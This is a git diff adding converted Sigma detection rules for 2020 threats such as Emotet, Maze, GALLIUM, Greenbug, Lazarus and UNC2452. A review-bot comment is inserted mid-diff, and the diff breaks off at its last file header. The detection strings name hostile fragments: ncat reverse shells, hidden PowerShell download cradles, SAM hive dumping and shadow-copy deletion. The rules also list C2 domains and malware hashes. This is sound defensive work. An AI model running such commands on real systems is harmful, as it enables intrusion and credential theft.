+++ b/tools/sigmac/converted_rules/builtin/emerging-threats/2020/Exploits/CVE-2020-1048/proc_creation_win_exploit_cve_2020_1048.yml
@@ -0,0 +1,36 @@
+title: Suspicious PrinterPorts Creation (CVE-2020-1048)
+id: cc08d590-8b90-413a-aff6-31d1a99678d7
+status: test
+description: Detects new commands that add new printer port which point to suspicious file
+references:
+ - https://windows-internals.com/printdemon-cve-2020-1048/
+author: EagleEye Team, Florian Roth
+date: 2020/05/13
+modified: 2021/11/27
+tags:
+ - attack.persistence
+ - attack.execution
+ - attack.t1059.001
+ - cve.2020.1048
+ - detection.emerging_threats
+logsource:
+ category: process_creation
+ product: windows
+detection:
+ process_creation:
+ EventID: 4688
+ Channel: Security
+ selection1:
+ CommandLine|contains: Add-PrinterPort -Name
+ selection2:
+ CommandLine|contains:
+ - .exe
+ - .dll
+ - .bat
+ selection3:
+ CommandLine|contains: Generic / Text Only
+ condition: process_creation and ((selection1 and selection2) or selection3)
+falsepositives:
+ - New printer port install on host
+level: high
+ruletype: Sigma
diff --git a/tools/sigmac/converted_rules/builtin/emerging-threats/2020/Exploits/CVE-2020-1350/proc_creation_win_exploit_cve_2020_1350.yml b/tools/sigmac/converted_rules/builtin/emerging-threats/2020/Exploits/CVE-2020-1350/proc_creation_win_exploit_cve_2020_1350.yml
new file mode 100644
index 000000000..cb7a47f54
--- /dev/null
+++ b/tools/sigmac/converted_rules/builtin/emerging-threats/2020/Exploits/CVE-2020-1350/proc_creation_win_exploit_cve_2020_1350.yml
@@ -0,0 +1,37 @@
+title: DNS RCE CVE-2020-1350
+id: b5281f31-f9cc-4d0d-95d0-45b91c45b487
+status: test
+description: Detects exploitation of DNS RCE bug reported in CVE-2020-1350 by the detection of suspicious sub process
+references:
+ - https://research.checkpoint.com/2020/resolving-your-way-into-domain-admin-exploiting-a-17-year-old-bug-in-windows-dns-servers/
+ - https://blog.menasec.net/2019/02/threat-hunting-24-microsoft-windows-dns.html
+author: Florian Roth (Nextron Systems)
+date: 2020/07/15
+modified: 2022/07/12
+tags:
+ - attack.initial_access
+ - attack.t1190
+ - attack.execution
+ - attack.t1569.002
+ - cve.2020.1350
+ - detection.emerging_threats
+logsource:
+ category: process_creation
+ product: windows
+detection:
+ process_creation:
+ EventID: 4688
+ Channel: Security
+ selection:
+ ParentProcessName|endswith: \System32\dns.exe
+ filter:
+ NewProcessName|endswith:
+ - \System32\werfault.exe
+ - \System32\conhost.exe
+ - \System32\dnscmd.exe
+ - \System32\dns.exe
+ condition: process_creation and (selection and not filter)
+falsepositives:
+ - Unknown but benign sub processes of the Windows DNS service dns.exe
+level: critical
+ruletype: Sigma
diff --git a/tools/sigmac/converted_rules/builtin/emerging-threats/2020/Malware/Blue-Mockingbird/proc_creation_win_malware_blue_mockingbird.yml b/tools/sigmac/converted_rules/builtin/emerging-threats/2020/Malware/Blue-Mockingbird/proc_creation_win_malware_blue_mockingbird.yml
new file mode 100644
index 000000000..5b83188eb
--- /dev/null
+++ b/tools/sigmac/converted_rules/builtin/emerging-threats/2020/Malware/Blue-Mockingbird/proc_creation_win_malware_blue_mockingbird.yml
@@ -0,0 +1,37 @@
+title: Blue Mockingbird
+id: c3198a27-23a0-4c2c-af19-e5328d49680e
+related:
+ - id: ce239692-aa94-41b3-b32f-9cab259c96ea
+ type: merged
+status: test
+description: Attempts to detect system changes made by Blue Mockingbird
+references:
+ - https://redcanary.com/blog/blue-mockingbird-cryptominer/
+author: Trent Liffick (@tliffick)
+date: 2020/05/14
+modified: 2022/10/09
+tags:
+ - attack.execution
+ - attack.t1112
+ - attack.t1047
+ - detection.emerging_threats
+logsource:
+ category: process_creation
+ product: windows
+detection:
+ process_creation:
+ EventID: 4688
+ Channel: Security
+ sc_cmd:
+ CommandLine|contains|all:
+ - sc config
+ - wercplsupporte.dll
+ NewProcessName|endswith: \cmd.exe
+ wmic_cmd:
+ CommandLine|endswith: COR_PROFILER
+ NewProcessName|endswith: \wmic.exe
+ condition: process_creation and (sc_cmd or wmic_cmd)
+falsepositives:
+ - Unknown
+level: high
+ruletype: Sigma
diff --git a/tools/sigmac/converted_rules/builtin/emerging-threats/2020/Malware/Emotet/proc_creation_win_malware_emotet_rundll32_execution.yml b/tools/sigmac/converted_rules/builtin/emerging-threats/2020/Malware/Emotet/proc_creation_win_malware_emotet_rundll32_execution.yml
new file mode 100644
index 000000000..45ea2cd02
--- /dev/null
+++ b/tools/sigmac/converted_rules/builtin/emerging-threats/2020/Malware/Emotet/proc_creation_win_malware_emotet_rundll32_execution.yml
@@ -0,0 +1,41 @@
+title: Potential Emotet Rundll32 Execution
+id: 54e57ce3-0672-46eb-a402-2c0948d5e3e9
+status: test
+description: Detecting Emotet DLL loading by looking for rundll32.exe processes with command lines ending in ,RunDLL or ,Control_RunDLL
+references:
+ - https://paste.cryptolaemus.com/emotet/2020/12/22/emotet-malware-IoCs_12-22-20.html
+ - https://cyber.wtf/2021/11/15/guess-whos-back/
+author: FPT.EagleEye
+date: 2020/12/25
+modified: 2023/02/21
+tags:
+ - attack.defense_evasion
+ - attack.t1218.011
+ - detection.emerging_threats
+logsource:
+ category: process_creation
+ product: windows
+detection:
+ process_creation:
+ EventID: 4688
+ Channel: Security
+ selection_img:
+ - NewProcessName|endswith: \rundll32.exe
+ - OriginalFileName: RUNDLL32.EXE
+ selection_cli:
+ CommandLine|endswith:
+ - ',RunDLL'
+ - ',Control_RunDLL'
+ # - ',#1' too generic - function load by ordinal is not Emotet specific
+ filter_legitimate_dll:
+ CommandLine|endswith:
+ - .dll,Control_RunDLL
+ - .dll",Control_RunDLL
+ - .dll',Control_RunDLL
+ filter_ide:
+ ParentProcessName|endswith: \tracker.exe
+ condition: process_creation and (all of selection_* and not 1 of filter_*)
+falsepositives:
+ - Unknown
+level: critical
+ruletype: Sigma
diff --git a/tools/sigmac/converted_rules/builtin/emerging-threats/2020/Malware/Ke3chang-TidePool/proc_creation_win_malware_ke3chang_tidepool.yml b/tools/sigmac/converted_rules/builtin/emerging-threats/2020/Malware/Ke3chang-TidePool/proc_creation_win_malware_ke3chang_tidepool.yml
new file mode 100644
index 000000000..4879d7db9
--- /dev/null
+++ b/tools/sigmac/converted_rules/builtin/emerging-threats/2020/Malware/Ke3chang-TidePool/proc_creation_win_malware_ke3chang_tidepool.yml
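Review bot: `selection_img` lists `OriginalFileName: RUNDLL32.EXE` as an alternative, but Security event 4688 does not carry an OriginalFileName field (that comes from Sysmon event 1), so in this builtin conversion the alternative can never match and the selection effectively reduces to `NewProcessName|endswith: \rundll32.exe`; dropping the line or marking it `# OriginalFileName is not present in 4688 - kept only for parity with the Sysmon rule` would make that explicit. The GALLIUM rule converted in a later hunk (`proc_creation_win_apt_gallium_iocs.yml`) has the same problem more severely: both `selection_sysmon` (`Hashes|contains`) and `selection_hashes` (`sha256`/`sha1` lists) reference fields that 4688 does not provide, so as converted that rule cannot fire at all on builtin logs. Either pointing it at a Sysmon channel or adding a `definition:` stating that hash-based matching requires Sysmon would keep operators from assuming they have coverage they do not have.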
@@ -0,0 +1,37 @@
+title: Potential Ke3chang/TidePool Malware Activity
+id: 7b544661-69fc-419f-9a59-82ccc328f205
+status: test
+description: Detects registry modifications potentially related to the Ke3chang/TidePool malware as seen in campaigns running in 2019 and 2020
+references:
+ - https://web.archive.org/web/20200618080300/https://www.verfassungsschutz.de/embed/broschuere-2020-06-bfv-cyber-brief-2020-01.pdf
+ - https://unit42.paloaltonetworks.com/operation-ke3chang-resurfaces-with-new-tidepool-malware/
+author: Markus Neis, Swisscom
+date: 2020/06/18
+modified: 2023/03/10
+tags:
+ - attack.g0004
+ - attack.defense_evasion
+ - attack.t1562.001
+ - detection.emerging_threats
+logsource:
+ category: process_creation
+ product: windows
+detection:
+ process_creation:
+ EventID: 4688
+ Channel: Security
+ selection:
+ # Ke3chang and TidePool both modify the IEHarden registry key, as well as the following list of keys.
+ # Setting these registry keys is unique to the Ke3chang and TidePool malware families.
+ # HKCU\Software\Microsoft\Internet Explorer\Main\Check_Associations
+ # HKCU\Software\Microsoft\Internet Explorer\Main\DisableFirstRunCustomize
+ # HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IEharden
+ CommandLine|contains:
+ - -Property DWORD -name DisableFirstRunCustomize -value 2 -Force
+ - -Property String -name Check_Associations -value
+ - -Property DWORD -name IEHarden -value 0 -Force
+ condition: process_creation and selection
+falsepositives:
+ - Unknown
+level: high
+ruletype: Sigma
diff --git a/tools/sigmac/converted_rules/builtin/emerging-threats/2020/Malware/Maze/proc_creation_win_malware_maze_ransomware.yml b/tools/sigmac/converted_rules/builtin/emerging-threats/2020/Malware/Maze/proc_creation_win_malware_maze_ransomware.yml
new file mode 100644
index 000000000..1175563a7
--- /dev/null
+++ b/tools/sigmac/converted_rules/builtin/emerging-threats/2020/Malware/Maze/proc_creation_win_malware_maze_ransomware.yml
@@ -0,0 +1,46 @@
+title: Potential Maze Ransomware Activity
+id: 29fd07fc-9cfd-4331-b7fd-cc18dfa21052
+status: test
+description: Detects specific process characteristics of Maze ransomware word document droppers
+references:
+ - https://www.fireeye.com/blog/threat-research/2020/05/tactics-techniques-procedures-associated-with-maze-ransomware-incidents.html
+ - https://app.any.run/tasks/51e7185c-52d7-4efb-ac0d-e86340053473/
+ - https://app.any.run/tasks/65a79440-373a-4725-8d74-77db9f2abda4/
+author: Florian Roth (Nextron Systems)
+date: 2020/05/08
+modified: 2023/02/13
+tags:
+ - attack.execution
+ - attack.t1204.002
+ - attack.t1047
+ - attack.impact
+ - attack.t1490
+ - detection.emerging_threats
+logsource:
+ category: process_creation
+ product: windows
+detection:
+ # Dropper
+ process_creation:
+ EventID: 4688
+ Channel: Security
+ selection1:
+ ParentProcessName|endswith: \WINWORD.exe
+ NewProcessName|endswith: .tmp
+ selection2:
+ CommandLine|endswith: shadowcopy delete
+ # Specific Pattern
+ NewProcessName|endswith: \wmic.exe
+ ParentProcessName|contains: \Temp\
+ selection3:
+ CommandLine|endswith: shadowcopy delete
+ CommandLine|contains: \..\..\system32
+ condition: process_creation and (1 of selection*)
+fields:
+ - SubjectUserName
+ - NewProcessName
+ - ComputerName
+falsepositives:
+ - Unlikely
+level: critical
+ruletype: Sigma
diff --git a/tools/sigmac/converted_rules/builtin/emerging-threats/2020/TA/Evilnum/proc_creation_win_apt_evilnum_jul20.yml b/tools/sigmac/converted_rules/builtin/emerging-threats/2020/TA/Evilnum/proc_creation_win_apt_evilnum_jul20.yml
new file mode 100644
index 000000000..bd10990aa
--- /dev/null
+++ b/tools/sigmac/converted_rules/builtin/emerging-threats/2020/TA/Evilnum/proc_creation_win_apt_evilnum_jul20.yml
@@ -0,0 +1,33 @@
+title: EvilNum APT Golden Chickens Deployment Via OCX Files
+id: 8acf3cfa-1e8c-4099-83de-a0c4038e18f0
+status: test
+description: Detects Golden Chickens deployment method as used by Evilnum and described in ESET July 2020 report
+references:
+ - https://www.welivesecurity.com/2020/07/09/more-evil-deep-look-evilnum-toolset/
+ - https://app.any.run/tasks/33d37fdf-158d-4930-aa68-813e1d5eb8ba/
+author: Florian Roth (Nextron Systems)
+date: 2020/07/10
+modified: 2023/03/09
+tags:
+ - attack.defense_evasion
+ - attack.t1218.011
+ - detection.emerging_threats
+logsource:
+ category: process_creation
+ product: windows
+detection:
+ process_creation:
+ EventID: 4688
+ Channel: Security
+ selection:
+ CommandLine|contains|all:
+ - regsvr32
+ - /s
+ - /i
+ - \AppData\Roaming\
+ - .ocx
+ condition: process_creation and selection
+falsepositives:
+ - Unknown
+level: critical
+ruletype: Sigma
diff --git a/tools/sigmac/converted_rules/builtin/emerging-threats/2020/TA/GALLIUM/proc_creation_win_apt_gallium_iocs.yml b/tools/sigmac/converted_rules/builtin/emerging-threats/2020/TA/GALLIUM/proc_creation_win_apt_gallium_iocs.yml
new file mode 100644
index 000000000..0d71c46b8
--- /dev/null
+++ b/tools/sigmac/converted_rules/builtin/emerging-threats/2020/TA/GALLIUM/proc_creation_win_apt_gallium_iocs.yml
@@ -0,0 +1,110 @@
+title: GALLIUM IOCs
+id: 440a56bf-7873-4439-940a-1c8a671073c2
+status: test
+description: Detects artifacts associated with GALLIUM cyber espionage group as reported by Microsoft Threat Intelligence Center in the December 2019 report.
+references:
+ - https://www.microsoft.com/security/blog/2019/12/12/gallium-targeting-global-telecom/
+ - https://github.com/Azure/Azure-Sentinel/blob/a02ce85c96f162de6f8cc06f07a53b6525f0ff7f/Solutions/Legacy%20IOC%20based%20Threat%20Protection/Analytic%20Rules/GalliumIOCs.yaml
+author: Tim Burrell
+date: 2020/02/07
+modified: 2023/03/09
+tags:
+ - attack.credential_access
+ - attack.command_and_control
+ - attack.t1212
+ - attack.t1071
+ - attack.g0093
+ - detection.emerging_threats
+logsource:
+ product: windows
+ category: process_creation
+detection:
+ process_creation:
+ EventID: 4688
+ Channel: Security
+ selection_sysmon:
+ Hashes|contains:
+ - SHA256=9ae7c4a4e1cfe9b505c3a47e66551eb1357affee65bfefb0109d02f4e97c06dd
+ - SHA256=7772d624e1aed327abcd24ce2068063da0e31bb1d5d3bf2841fc977e198c6c5b
+ - SHA256=657fc7e6447e0065d488a7db2caab13071e44741875044f9024ca843fe4e86b5
+ - SHA256=2ef157a97e28574356e1d871abf75deca7d7a1ea662f38b577a06dd039dbae29
+ - SHA256=52fd7b90d7144ac448af4008be639d4d45c252e51823f4311011af3207a5fc77
+ - SHA256=a370e47cb97b35f1ae6590d14ada7561d22b4a73be0cb6df7e851d85054b1ac3
+ - SHA256=5bf80b871278a29f356bd42af1e35428aead20cd90b0c7642247afcaaa95b022
+ - SHA256=6f690ccfd54c2b02f0c3cb89c938162c10cbeee693286e809579c540b07ed883
+ - SHA256=3c884f776fbd16597c072afd81029e8764dd57ee79d798829ca111f5e170bd8e
+ - SHA256=1922a419f57afb351b58330ed456143cc8de8b3ebcbd236d26a219b03b3464d7
+ - SHA256=fe0e4ef832b62d49b43433e10c47dc51072959af93963c790892efc20ec422f1
+ - SHA256=7ce9e1c5562c8a5c93878629a47fe6071a35d604ed57a8f918f3eadf82c11a9c
+ - SHA256=178d5ee8c04401d332af331087a80fb4e5e2937edfba7266f9be34a5029b6945
+ - SHA256=51f70956fa8c487784fd21ab795f6ba2199b5c2d346acdeef1de0318a4c729d9
+ - 
SHA256=889bca95f1a69e94aaade1e959ed0d3620531dc0fc563be9a8decf41899b4d79
+ - SHA256=332ddaa00e2eb862742cb8d7e24ce52a5d38ffb22f6c8bd51162bd35e84d7ddf
+ - SHA256=44bcf82fa536318622798504e8369e9dcdb32686b95fcb44579f0b4efa79df08
+ - SHA256=63552772fdd8c947712a2cff00dfe25c7a34133716784b6d486227384f8cf3ef
+ - SHA256=056744a3c371b5938d63c396fe094afce8fb153796a65afa5103e1bffd7ca070
+ - SHA1=53a44c2396d15c3a03723fa5e5db54cafd527635
+ - SHA1=9c5e496921e3bc882dc40694f1dcc3746a75db19
+ - SHA1=aeb573accfd95758550cf30bf04f389a92922844
+ - SHA1=79ef78a797403a4ed1a616c68e07fff868a8650a
+ - SHA1=4f6f38b4cec35e895d91c052b1f5a83d665c2196
+ - SHA1=1e8c2cac2e4ce7cbd33c3858eb2e24531cb8a84d
+ - SHA1=e841a63e47361a572db9a7334af459ddca11347a
+ - SHA1=c28f606df28a9bc8df75a4d5e5837fc5522dd34d
+ - SHA1=2e94b305d6812a9f96e6781c888e48c7fb157b6b
+ - SHA1=dd44133716b8a241957b912fa6a02efde3ce3025
+ - SHA1=8793bf166cb89eb55f0593404e4e933ab605e803
+ - SHA1=a39b57032dbb2335499a51e13470a7cd5d86b138
+ - SHA1=41cc2b15c662bc001c0eb92f6cc222934f0beeea
+ - SHA1=d209430d6af54792371174e70e27dd11d3def7a7
+ - SHA1=1c6452026c56efd2c94cea7e0f671eb55515edb0
+ - SHA1=c6b41d3afdcdcaf9f442bbe772f5da871801fd5a
+ - SHA1=4923d460e22fbbf165bbbaba168e5a46b8157d9f
+ - SHA1=f201504bd96e81d0d350c3a8332593ee1c9e09de
+ - SHA1=ddd2db1127632a2a52943a2fe516a2e7d05d70d2
+ selection_hashes:
+ - sha256:
+ - 9ae7c4a4e1cfe9b505c3a47e66551eb1357affee65bfefb0109d02f4e97c06dd
+ - 7772d624e1aed327abcd24ce2068063da0e31bb1d5d3bf2841fc977e198c6c5b
+ - 657fc7e6447e0065d488a7db2caab13071e44741875044f9024ca843fe4e86b5
+ - 2ef157a97e28574356e1d871abf75deca7d7a1ea662f38b577a06dd039dbae29
+ - 52fd7b90d7144ac448af4008be639d4d45c252e51823f4311011af3207a5fc77
+ - a370e47cb97b35f1ae6590d14ada7561d22b4a73be0cb6df7e851d85054b1ac3
+ - 5bf80b871278a29f356bd42af1e35428aead20cd90b0c7642247afcaaa95b022
+ - 6f690ccfd54c2b02f0c3cb89c938162c10cbeee693286e809579c540b07ed883
+ - 3c884f776fbd16597c072afd81029e8764dd57ee79d798829ca111f5e170bd8e
+ - 
1922a419f57afb351b58330ed456143cc8de8b3ebcbd236d26a219b03b3464d7
+ - fe0e4ef832b62d49b43433e10c47dc51072959af93963c790892efc20ec422f1
+ - 7ce9e1c5562c8a5c93878629a47fe6071a35d604ed57a8f918f3eadf82c11a9c
+ - 178d5ee8c04401d332af331087a80fb4e5e2937edfba7266f9be34a5029b6945
+ - 51f70956fa8c487784fd21ab795f6ba2199b5c2d346acdeef1de0318a4c729d9
+ - 889bca95f1a69e94aaade1e959ed0d3620531dc0fc563be9a8decf41899b4d79
+ - 332ddaa00e2eb862742cb8d7e24ce52a5d38ffb22f6c8bd51162bd35e84d7ddf
+ - 44bcf82fa536318622798504e8369e9dcdb32686b95fcb44579f0b4efa79df08
+ - 63552772fdd8c947712a2cff00dfe25c7a34133716784b6d486227384f8cf3ef
+ - 056744a3c371b5938d63c396fe094afce8fb153796a65afa5103e1bffd7ca070
+ - sha1:
+ - 53a44c2396d15c3a03723fa5e5db54cafd527635
+ - 9c5e496921e3bc882dc40694f1dcc3746a75db19
+ - aeb573accfd95758550cf30bf04f389a92922844
+ - 79ef78a797403a4ed1a616c68e07fff868a8650a
+ - 4f6f38b4cec35e895d91c052b1f5a83d665c2196
+ - 1e8c2cac2e4ce7cbd33c3858eb2e24531cb8a84d
+ - e841a63e47361a572db9a7334af459ddca11347a
+ - c28f606df28a9bc8df75a4d5e5837fc5522dd34d
+ - 2e94b305d6812a9f96e6781c888e48c7fb157b6b
+ - dd44133716b8a241957b912fa6a02efde3ce3025
+ - 8793bf166cb89eb55f0593404e4e933ab605e803
+ - a39b57032dbb2335499a51e13470a7cd5d86b138
+ - 41cc2b15c662bc001c0eb92f6cc222934f0beeea
+ - d209430d6af54792371174e70e27dd11d3def7a7
+ - 1c6452026c56efd2c94cea7e0f671eb55515edb0
+ - c6b41d3afdcdcaf9f442bbe772f5da871801fd5a
+ - 4923d460e22fbbf165bbbaba168e5a46b8157d9f
+ - f201504bd96e81d0d350c3a8332593ee1c9e09de
+ - ddd2db1127632a2a52943a2fe516a2e7d05d70d2
+ condition: process_creation and (1 of selection_*)
+falsepositives:
+ - Unknown
+level: high
+ruletype: Sigma
diff --git a/tools/sigmac/converted_rules/builtin/emerging-threats/2020/TA/GALLIUM/win_dns_analytic_apt_gallium.yml b/tools/sigmac/converted_rules/builtin/emerging-threats/2020/TA/GALLIUM/win_dns_analytic_apt_gallium.yml
new file mode 100644
index 000000000..3d9a4471d
--- /dev/null
+++ b/tools/sigmac/converted_rules/builtin/emerging-threats/2020/TA/GALLIUM/win_dns_analytic_apt_gallium.yml
@@ -0,0 +1,40 @@
+title: GALLIUM Artefacts - Builtin
+id: 3db10f25-2527-4b79-8d4b-471eb900ee29
+related:
+ - id: 440a56bf-7873-4439-940a-1c8a671073c2
+ type: derived
+status: test
+description: Detects artefacts associated with activity group GALLIUM - Microsoft Threat Intelligence Center indicators released in December 2019.
+references:
+ - https://www.microsoft.com/security/blog/2019/12/12/gallium-targeting-global-telecom/
+ - https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-R2-and-2012/dn800669(v=ws.11)
+author: Tim Burrell
+date: 2020/02/07
+modified: 2023/01/02
+tags:
+ - attack.credential_access
+ - attack.command_and_control
+ - attack.t1071
+ - detection.emerging_threats
+logsource:
+ product: windows
+ service: dns-server-analytic
+ definition: 'Requirements: Microsoft-Windows-DNS-Server/Analytical ({EB79061A-A566-4698-9119-3ED2807060E7}) Event Log must be collected in order to receive the events.'
+detection:
+ dns_server_analytic:
+ Channel: Microsoft-Windows-DNS-Server/Analytical
+ selection:
+ EventID: 257
+ QNAME:
+ - asyspy256.ddns.net
+ - hotkillmail9sddcc.ddns.net
+ - rosaf112.ddns.net
+ - cvdfhjh1231.myftp.biz
+ - sz2016rose.ddns.net
+ - dffwescwer4325.myftp.biz
+ - cvdfhjh1231.ddns.net
+ condition: dns_server_analytic and selection
+falsepositives:
+ - Unknown
+level: high
+ruletype: Sigma
diff --git a/tools/sigmac/converted_rules/builtin/emerging-threats/2020/TA/Greenbug/proc_creation_win_apt_greenbug_may20.yml b/tools/sigmac/converted_rules/builtin/emerging-threats/2020/TA/Greenbug/proc_creation_win_apt_greenbug_may20.yml
new file mode 100644
index 000000000..0c0730e8d
--- /dev/null
+++ b/tools/sigmac/converted_rules/builtin/emerging-threats/2020/TA/Greenbug/proc_creation_win_apt_greenbug_may20.yml
@@ -0,0 +1,56 @@
+title: Greenbug Espionage Group Indicators
+id: 3711eee4-a808-4849-8a14-faf733da3612
+status: test
+description: Detects tools and process executions used by Greenbug in their May 2020 campaign as reported by Symantec
+references:
+ - https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/greenbug-espionage-telco-south-asia
+author: Florian Roth (Nextron Systems)
+date: 2020/05/20
+modified: 2023/03/09
+tags:
+ - attack.g0049
+ - attack.execution
+ - attack.t1059.001
+ - attack.command_and_control
+ - attack.t1105
+ - attack.defense_evasion
+ - attack.t1036.005
+ - detection.emerging_threats
+logsource:
+ category: process_creation
+ product: windows
+detection:
+ process_creation:
+ EventID: 4688
+ Channel: Security
+ selection_img:
+ NewProcessName|endswith:
+ - :\ProgramData\adobe\Adobe.exe
+ - :\ProgramData\oracle\local.exe
+ - \revshell.exe
+ - \infopagesbackup\ncat.exe
+ - :\ProgramData\comms\comms.exe
+ selection_msf:
+ CommandLine|contains|all:
+ - -ExecutionPolicy Bypass -File
+ - \msf.ps1
+ selection_ncat:
+ CommandLine|contains|all:
+ - infopagesbackup
+ - \ncat
+ - -e cmd.exe
+ selection_powershell:
+ CommandLine|contains:
+ - system.Data.SqlClient.SqlDataAdapter($cmd); [void]$da.fill
+ - -nop -w hidden -c $k=new-object
+ - '[Net.CredentialCache]::DefaultCredentials;IEX '
+ - ' -nop -w hidden -c $m=new-object net.webclient;$m'
+ - -noninteractive -executionpolicy bypass whoami
+ - -noninteractive -executionpolicy bypass netstat -a
+ selection_other:
+ CommandLine|contains: L3NlcnZlcj1 # base64 encoded '/server='
+ condition: process_creation and (1 of selection_*)
+falsepositives:
+ - Unlikely
+level: critical
+ruletype: Sigma
diff --git a/tools/sigmac/converted_rules/builtin/emerging-threats/2020/TA/Lazarus/proc_creation_win_apt_lazarus_group_activity.yml b/tools/sigmac/converted_rules/builtin/emerging-threats/2020/TA/Lazarus/proc_creation_win_apt_lazarus_group_activity.yml
new file mode 100644
index 000000000..8682aeb67
--- /dev/null
+++ b/tools/sigmac/converted_rules/builtin/emerging-threats/2020/TA/Lazarus/proc_creation_win_apt_lazarus_group_activity.yml
@@ -0,0 +1,64 @@
+title: Lazarus Group Activity
+id: 24c4d154-05a4-4b99-b57d-9b977472443a
+related:
+ - id: 7b49c990-4a9a-4e65-ba95-47c9cc448f6e
+ type: obsoletes
+status: test
+description: Detects different process execution behaviors as described in various threat reports on Lazarus group activity
+references:
+ - https://securelist.com/lazarus-covets-covid-19-related-intelligence/99906/
+ - https://www.hvs-consulting.de/lazarus-report/
+author: Florian Roth (Nextron Systems), wagga
+date: 2020/12/23
+modified: 2023/03/10
+tags:
+ - attack.g0032
+ - attack.execution
+ - attack.t1059
+ - detection.emerging_threats
+logsource:
+ category: process_creation
+ product: windows
+detection:
+ process_creation:
+ EventID: 4688
+ Channel: Security
+ selection_generic:
+ CommandLine|contains:
+ - reg.exe save hklm\sam %temp%\~reg_sam.save
+ - 1q2w3e4r@#$@#$@#$
+ - ' -hp1q2w3e4 '
+ - '.dat data03 10000 -p '
+ selection_netstat:
+ CommandLine|contains|all:
+ - 'netstat -aon | find '
+ - ESTA
+ - ' > %temp%\~'
+ # Network share discovery
+ selection_network_discovery:
+ CommandLine|contains|all:
+ - .255 10 C:\ProgramData\IBM\
+ - .DAT
+ selection_persistence:
+ CommandLine|contains|all:
+ - ' /c '
+ - ' -p 0x'
+ CommandLine|contains:
+ - C:\ProgramData\
+ - C:\RECYCLER\
+ selection_rundll32:
+ CommandLine|contains|all:
+ - 'rundll32 '
+ - C:\ProgramData\
+ CommandLine|contains:
+ - .bin,
+ - .tmp,
+ - .dat,
+ - .io,
+ - .ini,
+ - .db,
+ condition: process_creation and (1 of selection_*)
+falsepositives:
+ - Unlikely
+level: critical
+ruletype: Sigma
diff --git a/tools/sigmac/converted_rules/builtin/emerging-threats/2020/TA/SolarWinds-Supply-Chain/proc_creation_win_apt_unc2452_cmds.yml b/tools/sigmac/converted_rules/builtin/emerging-threats/2020/TA/SolarWinds-Supply-Chain/proc_creation_win_apt_unc2452_cmds.yml
new file mode 100644
index 000000000..460e604ce
--- /dev/null
+++ b/tools/sigmac/converted_rules/builtin/emerging-threats/2020/TA/SolarWinds-Supply-Chain/proc_creation_win_apt_unc2452_cmds.yml
@@ -0,0 +1,60 @@
+title: UNC2452 Process Creation Patterns
+id: 9be34ad0-b6a7-4fbd-91cf-fc7ec1047f5f
+status: test
+description: Detects a specific process creation patterns as seen used by UNC2452 and provided by Microsoft as Microsoft Defender ATP queries
+references:
+ - https://www.microsoft.com/security/blog/2021/01/20/deep-dive-into-the-solorigate-second-stage-activation-from-sunburst-to-teardrop-and-raindrop/
+author: Florian Roth (Nextron Systems)
+date: 2021/01/22
+modified: 2023/09/12
+tags:
+ - attack.execution
+ - attack.t1059.001
+ - detection.emerging_threats
+ # - sunburst
+ # - unc2452
+logsource:
+ category: process_creation
+ product: windows
+detection:
+ # To avoid writing complex condition. "selection_generic_1" and "selection_generic_2" are the same except for the extension used.
+ process_creation:
+ EventID: 4688
+ Channel: Security
+ selection_generic_1:
+ CommandLine|contains:
+ - 7z.exe a -v500m -mx9 -r0 -p
+ - 7z.exe a -mx9 -r0 -p
+ CommandLine|contains|all:
+ - .zip
+ - .txt
+ selection_generic_2:
+ CommandLine|contains:
+ - 7z.exe a -v500m -mx9 -r0 -p
+ - 7z.exe a -mx9 -r0 -p
+ CommandLine|contains|all:
+ - .zip
+ - .log
+ selection_generic_3:
+ ParentCommandLine|contains|all:
+ - wscript.exe
+ - .vbs
+ CommandLine|contains|all:
+ - rundll32.exe
+ - C:\Windows
+ - .dll,Tk_
+ selection_generic_4:
+ ParentCommandLine|contains:
+ - C:\Windows
+ - .dll
+ CommandLine|contains: 'cmd.exe /C '
+ ParentProcessName|endswith: \rundll32.exe
+ selection_generic_5:
+ CommandLine: ''
+ ParentProcessName|endswith: \rundll32.exe
+ NewProcessName|endswith: \dllhost.exe
+ condition: process_creation and (1 of selection_generic_*)
+falsepositives:
+ - Unknown
+level: high
+ruletype: Sigma
diff --git a/tools/sigmac/converted_rules/builtin/emerging-threats/2020/TA/SolarWinds-Supply-Chain/proc_creation_win_apt_unc2452_ps.yml b/tools/sigmac/converted_rules/builtin/emerging-threats/2020/TA/SolarWinds-Supply-Chain/proc_creation_win_apt_unc2452_ps.yml
new file mode 100644
index 000000000..08ee32a67
--- /dev/null
+++ b/tools/sigmac/converted_rules/builtin/emerging-threats/2020/TA/SolarWinds-Supply-Chain/proc_creation_win_apt_unc2452_ps.yml
@@ -0,0 +1,37 @@
+title: UNC2452 PowerShell Pattern
+id: b7155193-8a81-4d8f-805d-88de864ca50c
+status: test
+description: Detects a specific PowerShell command line pattern used by the UNC2452 actors as mentioned in Microsoft and Symantec reports
+references:
+ - https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/solarwinds-raindrop-malware
+ - https://www.microsoft.com/security/blog/2020/12/18/analyzing-solorigate-the-compromised-dll-file-that-started-a-sophisticated-cyberattack-and-how-microsoft-defender-helps-protect/
+ - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1047/T1047.md#atomic-test-7---create-a-process-using-wmi-query-and-an-encoded-command
+author: Florian Roth (Nextron Systems)
+date: 2021/01/20
+modified: 2022/10/09
+tags:
+ - attack.execution
+ - attack.t1059.001
+ - attack.t1047
+ - detection.emerging_threats
+ # - sunburst
+logsource:
+ category: process_creation
+ product: windows
+detection:
+ process_creation:
+ EventID: 4688
+ Channel: Security
+ selection_cli_1:
+ CommandLine|contains|all:
+ - Invoke-WMIMethod win32_process -name create -argumentlist
+ - rundll32 c:\windows
+ selection_cli_2:
+ CommandLine|contains|all:
+ - 'wmic /node:'
+ - process call create "rundll32 c:\windows
+ condition: process_creation and (1 of selection_*)
+falsepositives:
+ - Unlikely
+level: critical
+ruletype: Sigma
diff --git a/tools/sigmac/converted_rules/builtin/emerging-threats/2020/TA/SolarWinds-Supply-Chain/proc_creation_win_apt_unc2452_vbscript_pattern.yml b/tools/sigmac/converted_rules/builtin/emerging-threats/2020/TA/SolarWinds-Supply-Chain/proc_creation_win_apt_unc2452_vbscript_pattern.yml
new file mode 100644
index 000000000..4c88c59f0
--- /dev/null
